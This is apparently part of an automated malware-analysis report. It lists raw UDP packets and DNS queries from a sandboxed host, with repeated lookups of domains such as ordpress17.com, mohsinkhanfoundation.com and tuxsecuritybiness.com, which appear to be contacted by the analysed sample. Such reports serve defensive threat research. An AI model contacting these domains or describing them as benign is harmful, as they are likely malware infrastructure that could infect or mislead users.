                                          Sep 27, 2021 20:26:51.814224958 CEST53622928.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:52.568475008 CEST5745353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:52.581841946 CEST53574538.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:53.348994970 CEST5013153192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:53.363605022 CEST53501318.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:54.144356012 CEST5245853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:55.192473888 CEST5245853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:55.205689907 CEST53524588.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:55.996365070 CEST5552753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:56.010369062 CEST53555278.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:56.759000063 CEST6346553192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:56.772144079 CEST53634658.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:57.537885904 CEST6355853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:57.551357031 CEST53635588.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:58.304603100 CEST5319253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:58.317310095 CEST53531928.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:59.087606907 CEST5936053192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:59.100308895 CEST53593608.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:59.871004105 CEST6174253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:59.884588957 CEST53617428.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:00.683235884 CEST6520953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:00.696050882 CEST53652098.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:01.461709023 CEST6372753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:01.475539923 CEST53637278.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:02.250102997 CEST5841053192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:02.263926029 CEST53584108.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:03.026706934 CEST6469253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:03.041388988 CEST53646928.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:03.821991920 CEST5670653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:03.835410118 CEST53567068.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:04.598339081 CEST5729253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:04.610857964 CEST53572928.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:05.373821974 CEST5952353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:05.386045933 CEST53595238.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:06.131067991 CEST6389653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:06.145781994 CEST53638968.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:06.934273005 CEST6354253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:06.948333979 CEST53635428.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:07.699145079 CEST6366953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:07.711954117 CEST53636698.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:08.462414026 CEST6086953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:08.476635933 CEST53608698.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:09.264369011 CEST5533053192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:09.280138016 CEST53553308.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:10.073828936 CEST6209553192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:10.087430954 CEST53620958.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:10.844527960 CEST5142553192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:10.857237101 CEST53514258.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:11.619561911 CEST5390853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:11.631730080 CEST53539088.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:12.415213108 CEST5969253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:12.430803061 CEST53596928.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:13.213284969 CEST5926853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:13.226983070 CEST53592688.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:13.980892897 CEST5510953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:13.996356964 CEST53551098.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:14.761775017 CEST5697353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:14.775722027 CEST53569738.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:15.560414076 CEST5732453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:15.573328972 CEST53573248.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:16.340569019 CEST4970653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:16.355988026 CEST53497068.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:17.120476007 CEST4924353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:17.133666039 CEST53492438.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:17.918859959 CEST5842053192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:17.933006048 CEST53584208.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:18.677347898 CEST6498753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:18.690586090 CEST53649878.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:19.852977037 CEST4926553192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:19.865675926 CEST53492658.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:20.666625977 CEST6162453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:20.679677963 CEST53616248.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:21.464464903 CEST5920353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:21.478529930 CEST53592038.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:21.545475960 CEST5221153192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:21.573528051 CEST53522118.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:22.228491068 CEST6094353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:22.242212057 CEST53609438.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:22.981463909 CEST5202153192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:23.015538931 CEST53520218.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:23.027650118 CEST5872953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:23.040184975 CEST53587298.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:23.797799110 CEST5885153192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:23.810910940 CEST53588518.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:24.591423988 CEST6061653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:24.605662107 CEST53606168.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:25.383204937 CEST5899653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:25.397234917 CEST53589968.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:26.638611078 CEST5497353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:26.651721001 CEST53549738.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:28.365613937 CEST6176353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:28.377547979 CEST53617638.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:29.136183977 CEST6290953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:29.148997068 CEST53629098.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:29.932790041 CEST6474153192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:29.947721004 CEST53647418.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:30.744966030 CEST5040753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:30.757169962 CEST53504078.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:31.530476093 CEST6298653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:31.544518948 CEST53629868.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:32.291270971 CEST4976653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:32.305871964 CEST53497668.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:33.093796968 CEST6244653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:33.108398914 CEST53624468.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:33.907108068 CEST5367653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:33.922348976 CEST53536768.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:34.684026003 CEST5703953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:34.697350979 CEST53570398.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:35.466766119 CEST4949053192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:35.480268002 CEST53494908.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:37.263170004 CEST6209053192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:37.276654959 CEST53620908.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:38.028683901 CEST6132453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:38.043040991 CEST53613248.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:38.809356928 CEST5119353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:38.822201967 CEST53511938.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:39.607177973 CEST6281753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:39.621783972 CEST53628178.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:40.668811083 CEST5549553192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:40.682873011 CEST53554958.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:41.427077055 CEST5349153192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:41.443505049 CEST53534918.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:42.570655107 CEST6242353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:42.583395004 CEST53624238.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:43.368947983 CEST5931653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:43.385703087 CEST53593168.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:44.244988918 CEST6358453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:44.257919073 CEST53635848.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:45.531595945 CEST5480853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:47.080384016 CEST5480853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:47.095489979 CEST53548088.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:47.887803078 CEST5781553192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:47.902513027 CEST53578158.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:48.671917915 CEST4974453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:48.684627056 CEST53497448.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:55.215161085 CEST5861153192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:55.229500055 CEST53586118.8.8.8192.168.2.7

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Sep 27, 2021 20:25:46.070871115 CEST192.168.2.78.8.8.80xed48Standard query (0)hoteloaktree.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:46.448447943 CEST192.168.2.78.8.8.80x1ca0Standard query (0)aterwellnessinc.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:46.482814074 CEST192.168.2.78.8.8.80x61fcStandard query (0)sirifinco.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:47.172194958 CEST192.168.2.78.8.8.80xe91Standard query (0)sirifinco.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:47.760514975 CEST192.168.2.78.8.8.80x43e8Standard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:47.791491985 CEST192.168.2.78.8.8.80x292aStandard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:48.569694042 CEST192.168.2.78.8.8.80xe508Standard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:48.591152906 CEST192.168.2.78.8.8.80x3911Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:49.374650002 CEST192.168.2.78.8.8.80xd446Standard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:49.419563055 CEST192.168.2.78.8.8.80x2283Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:49.429651976 CEST192.168.2.78.8.8.80xd318Standard query (0)r3.i.lencr.orgA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:49.510529995 CEST192.168.2.78.8.8.80xeb28Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:50.363708973 CEST192.168.2.78.8.8.80xa5ddStandard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:50.396615982 CEST192.168.2.78.8.8.80xa668Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:51.680702925 CEST192.168.2.78.8.8.80x144eStandard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:51.699728966 CEST192.168.2.78.8.8.80x5b79Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:52.387361050 CEST192.168.2.78.8.8.80x524eStandard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:52.406748056 CEST192.168.2.78.8.8.80x5cc9Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:52.523611069 CEST192.168.2.78.8.8.80x2148Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:53.092384100 CEST192.168.2.78.8.8.80x4064Standard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:53.127259970 CEST192.168.2.78.8.8.80x1c01Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:54.020759106 CEST192.168.2.78.8.8.80xd66eStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:54.086182117 CEST192.168.2.78.8.8.80xf44eStandard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:54.112126112 CEST192.168.2.78.8.8.80x26daStandard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:54.783556938 CEST192.168.2.78.8.8.80xeb44Standard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:54.853558064 CEST192.168.2.78.8.8.80x4e0cStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:54.853847027 CEST192.168.2.78.8.8.80xdb52Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:55.726558924 CEST192.168.2.78.8.8.80xe43eStandard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:55.768619061 CEST192.168.2.78.8.8.80x1154Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:55.769207001 CEST192.168.2.78.8.8.80xb28bStandard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:56.420384884 CEST192.168.2.78.8.8.80x3a39Standard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:56.438690901 CEST192.168.2.78.8.8.80xd9c3Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:57.108278990 CEST192.168.2.78.8.8.80x8f3aStandard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:57.128237963 CEST192.168.2.78.8.8.80xa53fStandard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:57.800359011 CEST192.168.2.78.8.8.80xba03Standard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:57.865005016 CEST192.168.2.78.8.8.80x6ec4Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:58.576149940 CEST192.168.2.78.8.8.80xa662Standard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:58.593990088 CEST192.168.2.78.8.8.80x6f6dStandard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:59.628273964 CEST192.168.2.78.8.8.80xd3a7Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:00.655344963 CEST192.168.2.78.8.8.80xa418Standard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:00.679641008 CEST192.168.2.78.8.8.80x5202Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:01.331425905 CEST192.168.2.78.8.8.80x485aStandard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:01.350888968 CEST192.168.2.78.8.8.80x833Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:01.451324940 CEST192.168.2.78.8.8.80x7abbStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:02.038477898 CEST192.168.2.78.8.8.80xad79Standard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:02.057113886 CEST192.168.2.78.8.8.80x74e4Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:02.380009890 CEST192.168.2.78.8.8.80x8d2cStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:02.814068079 CEST192.168.2.78.8.8.80xb84cStandard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:02.835577965 CEST192.168.2.78.8.8.80x14a9Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:03.338016987 CEST192.168.2.78.8.8.80x291bStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:03.541110992 CEST192.168.2.78.8.8.80xc730Standard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:03.559693098 CEST192.168.2.78.8.8.80x8caaStandard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:04.171557903 CEST192.168.2.78.8.8.80x58ddStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:04.254506111 CEST192.168.2.78.8.8.80xe1abStandard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:04.272145033 CEST192.168.2.78.8.8.80xd25eStandard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:04.996567011 CEST192.168.2.78.8.8.80x3ae2Standard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:04.997884989 CEST192.168.2.78.8.8.80x1cc3Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:05.016618013 CEST192.168.2.78.8.8.80xe823Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:05.756948948 CEST192.168.2.78.8.8.80x3261Standard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:05.777050972 CEST192.168.2.78.8.8.80xc32dStandard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:05.816279888 CEST192.168.2.78.8.8.80xb3e9Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:06.516752005 CEST192.168.2.78.8.8.80x919bStandard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:06.538594961 CEST192.168.2.78.8.8.80xe31fStandard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:06.603488922 CEST192.168.2.78.8.8.80xa05dStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:07.247575045 CEST192.168.2.78.8.8.80xd3ceStandard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:07.265738010 CEST192.168.2.78.8.8.80x58caStandard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:07.428716898 CEST192.168.2.78.8.8.80x700eStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:08.013267040 CEST192.168.2.78.8.8.80x4928Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:08.217582941 CEST192.168.2.78.8.8.80xefa0Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:08.672808886 CEST192.168.2.78.8.8.80xf5e3Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:09.026392937 CEST192.168.2.78.8.8.80xa130Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:09.368282080 CEST192.168.2.78.8.8.80xd860Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:09.825573921 CEST192.168.2.78.8.8.80xc058Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:10.044320107 CEST192.168.2.78.8.8.80x92c1Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:10.637665033 CEST192.168.2.78.8.8.80x4737Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:10.767505884 CEST192.168.2.78.8.8.80xbe06Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:11.422432899 CEST192.168.2.78.8.8.80x35cbStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:11.458966970 CEST192.168.2.78.8.8.80x24e3Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:12.158341885 CEST192.168.2.78.8.8.80xc921Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:12.251948118 CEST192.168.2.78.8.8.80xe6bfStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:12.859316111 CEST192.168.2.78.8.8.80x4c70Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:13.013920069 CEST192.168.2.78.8.8.80x237cStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:13.519613981 CEST192.168.2.78.8.8.80x9e77Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:13.808783054 CEST192.168.2.78.8.8.80xbb50Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:14.152801991 CEST192.168.2.78.8.8.80x6d56Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:14.615021944 CEST192.168.2.78.8.8.80xd043Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:14.810760975 CEST192.168.2.78.8.8.80x2fd3Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:15.408827066 CEST192.168.2.78.8.8.80x812fStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:15.496860981 CEST192.168.2.78.8.8.80xea9eStandard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:16.127614021 CEST192.168.2.78.8.8.80x7afcStandard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:16.178937912 CEST192.168.2.78.8.8.80xf614Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:16.935102940 CEST192.168.2.78.8.8.80xddbeStandard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:16.992950916 CEST192.168.2.78.8.8.80x7a5cStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:18.310174942 CEST192.168.2.78.8.8.80x158Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:18.382625103 CEST192.168.2.78.8.8.80xd7a6Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:19.987658978 CEST192.168.2.78.8.8.80xdbb7Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:20.157454014 CEST192.168.2.78.8.8.80x3925Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:20.762372971 CEST192.168.2.78.8.8.80xc814Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:20.921623945 CEST192.168.2.78.8.8.80x83cStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:21.455358982 CEST192.168.2.78.8.8.80xe784Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:21.696141958 CEST192.168.2.78.8.8.80xa76Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:22.155143023 CEST192.168.2.78.8.8.80x466Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:22.939822912 CEST192.168.2.78.8.8.80x53b6Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:22.942075014 CEST192.168.2.78.8.8.80x7a15Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:23.621762991 CEST192.168.2.78.8.8.80xd20fStandard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:23.702198982 CEST192.168.2.78.8.8.80x6a7eStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:24.263060093 CEST192.168.2.78.8.8.80x453aStandard query (0)lendbiz.vnA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:24.492841005 CEST192.168.2.78.8.8.80x9b3bStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:25.363213062 CEST192.168.2.78.8.8.80x3b7dStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:25.985630989 CEST192.168.2.78.8.8.80x8590Standard query (0)lendbiz.vnA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:26.155800104 CEST192.168.2.78.8.8.80x992eStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:26.947745085 CEST192.168.2.78.8.8.80xfeacStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:27.231370926 CEST192.168.2.78.8.8.80xfa21Standard query (0)lendbiz.vnA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:27.725392103 CEST192.168.2.78.8.8.80x2aaStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:28.490812063 CEST192.168.2.78.8.8.80x8f26Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:28.799000025 CEST192.168.2.78.8.8.80x8c90Standard query (0)lendbiz.vnA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:29.333806992 CEST192.168.2.78.8.8.80x7eabStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:30.018964052 CEST192.168.2.78.8.8.80x3c23Standard query (0)lendbiz.vnA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:30.103540897 CEST192.168.2.78.8.8.80x84d6Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
